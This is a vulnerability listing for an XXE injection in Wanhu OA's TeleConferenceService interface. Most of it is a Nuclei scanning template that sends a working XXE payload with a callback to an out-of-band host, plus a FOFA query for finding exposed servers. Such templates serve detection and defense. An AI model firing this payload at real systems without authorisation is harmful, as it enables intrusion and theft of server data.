漏洞描述
There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server.
wanhu-teleconferenceservice-xxe: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
PoC代码[已公开]
id: wanhu-teleconferenceservice-xxe
info:
name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
author: SleepingBag945
severity: high
description: |
There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server.
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20TeleConferenceService%20XXE%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="万户网络-ezOFFICE"
tags: wanhu,oa,xxe,vuln
http:
- raw:
- |
POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<value>&xxe;</value>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "<response>"
- "<retcode>"
condition: and
- type: word
part: header
words:
- "text/xml"
# digest: 4a0a00473045022100df104ffac1a1ffaee8f33d0c6cb08ceb65221fd941b44a70bfefb494d1b6c7b002203ab88451488a946a6a004f71b7b48b51a8f8edde7f0b1785dae005b539a68038:922c64590222798bb761d5b6d8e72950